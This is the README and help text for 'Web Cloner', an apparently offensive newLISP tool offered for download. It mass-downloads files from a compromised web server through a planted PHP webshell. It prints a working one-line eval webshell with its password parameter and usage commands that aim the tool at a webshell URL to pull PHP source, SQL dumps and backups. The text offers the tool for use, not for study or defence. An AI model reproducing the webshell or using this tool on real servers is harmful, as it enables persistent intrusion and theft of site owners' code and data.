|
Web Cloner [掠食者] 用来在服务器端无法使用系统命令和ZIP库文件的情况下, 批量下载服务器上的文件。待完善的功能包括多语言支持, 下载频度控制, Server代码动态切换, 多文件合并下载。
Options:
-s: Webshell 路径[必选]. (include code ex: <?php @eval($_POST['sb']);?> ).
-p: Webshell 密码[必选]. (lie above shell code ex: 'sb').
-i: 想要下载的文件的后缀, 判断代码在服务端执行[可选]. (ex:php inc sql bak).
-e: 想要排除的文件的后缀, 判断代码在服务端执行[可选]. (ex:php inc sql bak).
-ds: 服务器上要打包的目录的起始目录, 此目录相对于webshell[可选]. (server directory you want to save).
-dc: 本地用来保存下载文件的目录, 此目录相对于当前程序[可选]. (local directory to save the file).
-t: 超时[可选]. 默认 15 秒.
-bf: 大文件处理[可选]. 为了避免下载过大的文件, 影响整体进程, 只将大文件路径记录下来, 方便后续处理.
默认不下载如下后缀的大文件(及只使用-bf选项时): "zip|rar|tar|gz|tgz|z|7z|bz2|jar|iso|cab|mdb|mdf|ldf|log".
可手工指定替换默认的大文件后缀列表. (ex: -bf exe iso)
Usage:
newlisp cloner.lsp -s http://xxxx.com/cwk.php -p pwd [-i][-e][-ds][-dc][-t][-bf]
newlisp cloner.lsp -h
newlisp cloner.lsp -s http://xxxx.com/cwk.php -p sb -e jpeg jpg png gif html htm -safe -dc result
newlisp cloner.lsp -s http://xxxx.com/cwk.php -p sb -i php -ds . -dc . -t 20000
newlisp cloner.lsp -s http://xxxx.com/cwk.php -p sb -i php -ds ../ -dc result
newlisp cloner.lsp -s http://xxxx.com/cwk.php -p sb
Notice:
Web Cloner [掠食者]用来在服务器端无法使用系统命令和ZIP库文件的情况下, 批量下载服务器上的文件.
目前只支持PHP, 其他语言支持会在后续版本加入(因为调试很费时0.0!, 欢迎有经验的同学加入研究探讨^_^.).
编译方式: newlisp -x cloner.lsp cloner.exe (win) newlisp -x cloner.lsp cloner (nix)
Options:
-s: Webshell path (include code ex: <?php @eval($_POST['sb']);?> ).
-p: Webshell pass (lie above shell code ex: 'sb').
-i: Suffix of files you want to download (ex:php inc sql bak).
-e: Suffix of files you don't want to download (ex:php inc sql bak).
-ds: Relative directory with the webshell on server (server directory you want to save).
-dc: Relative directory with the cloner (local directory to save the file).
-t: Time out. default 15 seconds.
-bf: Bigfile process. all bigfile pathswill be recorded to facilitate the next step.
Deafault don't down file with following suffix "zip|rar|tar|gz|tgz|z|7z|bz2|jar|iso|cab|mdb|mdf|ldf|log"
But you can manually specify particular suffixs to replace the default list. (ex: -bf exe iso)项目地址 Download |
|